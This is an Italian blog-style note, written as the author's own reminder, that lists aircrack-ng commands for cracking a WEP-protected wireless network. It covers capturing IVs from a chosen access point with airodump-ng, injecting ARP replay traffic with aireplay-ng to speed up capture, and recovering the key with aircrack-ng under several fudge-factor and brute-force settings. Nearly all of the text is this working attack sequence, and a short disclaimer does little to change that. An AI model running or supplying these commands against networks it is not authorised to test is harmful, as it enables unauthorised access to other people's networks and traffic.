Crack di una rete wireless WEP

disclaimer: questa non vuole essere una guida per consentire ai lamer della domenica di scroccare la rete del vicino, bensì un reminder per il sottoscritto; quindi non me ne vogliano i lettori se ogni stringa non è proprio quel che si definisce un commento esplicativo. Ovviamente per qualunque dubbio potete sempre chiedere nei commenti.

controllo situazione
airodump-ng –ivs –write capturefile ath0

sniffing da ap specifico
airodump-ng –ivs –channel [Canale AP] –bssid [BSSID AP] –write capturefile ath0

stimolazione:
aireplay-ng –arpreplay -b [BSSID AP] -h [MAC client da airodump] ath0

300.000 IV DATA per wep 64bit
1.500.000 IV DATA per wep 128bit

cracking:
aircrack-ng -b [BSSID AP] [nomi dei file capture]

La chiave WEP a 128 bit viene visualizzata in formato esadecimale e può essere
inserita direttamente in un client wireless senza i caratteri “:”.

aircrack lanciato con fattore falsificazione 4, (più grande è, più è preciso e più
tempo ci vuole)
aircrack-ng -f 4 -b [BSSID AP] capturefile*.ivs

aircrack lanciato con fattore di falsificazione 8, e brute force sugli ultimi due byte
anzichè sull’ultimo. (ancora più tempo)
aircrack-ng -f 8 -x2 -b [BSSID AP] capturefile*.ivs

aircrack lanciato con fattore di falsificazione 512, dual core attivo e brute force sugli ultimi 4 byte
anzichè sull’ultimo. (lunghissimo)
aircrack-ng -p 2 -f 512 -x4 -b [BSSID AP] capturefile*.ivs